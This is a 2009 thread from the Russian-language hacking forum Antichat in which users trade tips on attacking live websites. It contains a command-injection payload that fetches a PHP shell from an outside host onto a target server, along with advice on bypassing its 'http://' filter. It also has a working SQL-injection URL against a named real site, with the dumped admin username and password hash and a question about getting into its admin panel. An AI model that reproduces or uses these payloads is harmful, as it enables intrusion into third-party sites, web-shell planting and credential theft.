ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5581  
Старый 20.02.2009, 11:17
laedafess
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969

Репутация: 169
По умолчанию

Цитата:
Сообщение от sabe  
есть запрос для залития шелла)


при этом фильтрует "http://"
тоесть https:// уже не фильтрует... но так не заливается.. наверника изза того что некому принять сертификат))
подскажите как обойти такой фильтр?
а ftp:// фильтрует?
 
Ответить с цитированием

  #5582  
Старый 20.02.2009, 11:35
joomler
Новичок
Регистрация: 19.02.2009
Сообщений: 25
Провел на форуме:
57669

Репутация: 10
По умолчанию

всем привет )
подскажите когда я проверяю скрип на -> ' но там все нормально , но когда я подставляю большое число пишет что запись с таким номером отсутствует ошибки скуля нет вот примет id=234 нормально а подставиш id=2349999 пишет что не существует. Говорит ли это что есть уязвимость?
Я вчера впервые провел пхп иньекцию прикольно))))
 
Ответить с цитированием

  #5583  
Старый 20.02.2009, 11:51
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Читаем:

http://forum.antichat.ru/thread104591.html
 
Ответить с цитированием

  #5584  
Старый 20.02.2009, 11:52
laedafess
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969

Репутация: 169
По умолчанию

нет, это говорит о том, о чем оно говорит) что такой записи нету.
Цитата:
Я вчера впервые провел пхп иньекцию прикольно))))
поздравляю
 
Ответить с цитированием

  #5585  
Старый 20.02.2009, 18:29
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Цитата:
Сообщение от joomler  
всем привет )
подскажите когда я проверяю скрип на -> ' но там все нормально , но когда я подставляю большое число пишет что запись с таким номером отсутствует ошибки скуля нет вот примет id=234 нормально а подставиш id=2349999 пишет что не существует. Говорит ли это что есть уязвимость?
Я вчера впервые провел пхп иньекцию прикольно))))
Угу, отсутствие страницы явно уязвимость. Из категории рутовых яваскриптов по протоколу TCP/IP, можно использовать только по вечерам четверга с 19:00 до 23:30 по местному времени.
__________________
..

Последний раз редактировалось .Slip; 20.02.2009 в 18:34..
 
Ответить с цитированием

  #5586  
Старый 20.02.2009, 19:45
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

laedafess
фтп не фильттрует))

-m0rgan-
какой хекс в смд? или я не понимаю

Цитата:
.php?dirname=+%26cd+_notes;fetch+http://site.com/shell.txt+-O+v.php%26
при этом фильтрует "http://"
а https:// не фильтрует.. но так не заливается.. наверника изза того что некому принять сертификат)) ftp:// тоже не фильтрует, фпт бес пароля fetch сможет пробить файл?)

подскажите как обойти такой фильтр?

Последний раз редактировалось sabe; 20.02.2009 в 20:26..
 
Ответить с цитированием

  #5587  
Старый 20.02.2009, 21:03
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

без протокола религия не позволяет?=) как вариант echo uploader > file
 
Ответить с цитированием

  #5588  
Старый 20.02.2009, 23:03
pingvit
Новичок
Регистрация: 10.03.2008
Сообщений: 27
Провел на форуме:
71866

Репутация: 1
По умолчанию

Цитата:
http://www.costa-real.ru/articlesInfo.php?id=-1+union+select+concat_ws(0x3a,user,password,email) ,2,3,4,5,6+from+ae_users--
Пароль админа в исходном тексте:
admin:21232f297a57a5a743894a0e4a801fc3
т.е admin:admin

админку долго не искал:
Цитата:
http://www.costa-real.ru/admin/index.php
Не пойму, почему залогиниться не могу?
 
Ответить с цитированием

  #5589  
Старый 20.02.2009, 23:32
S[N]EP
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме:
789539

Репутация: 53
По умолчанию

А что делать если при пхп иньекции фильтруются все символы просто убераются((
?act=(d,z.s:skfds) - выведет dzsskfds / а если ввести ?act=(d,z.s:s#kfds) - то только dzss обьясните такую странность)
 
Ответить с цитированием

  #5590  
Старый 20.02.2009, 23:50
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Цитата:
Сообщение от pingvit  
Пароль админа в исходном тексте:
admin:21232f297a57a5a743894a0e4a801fc3
т.е admin:admin

админку долго не искал:


Не пойму, почему залогиниться не могу?
Поищи другие таблицы, ибо не исключено,что этот логин/пасс не от админки...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ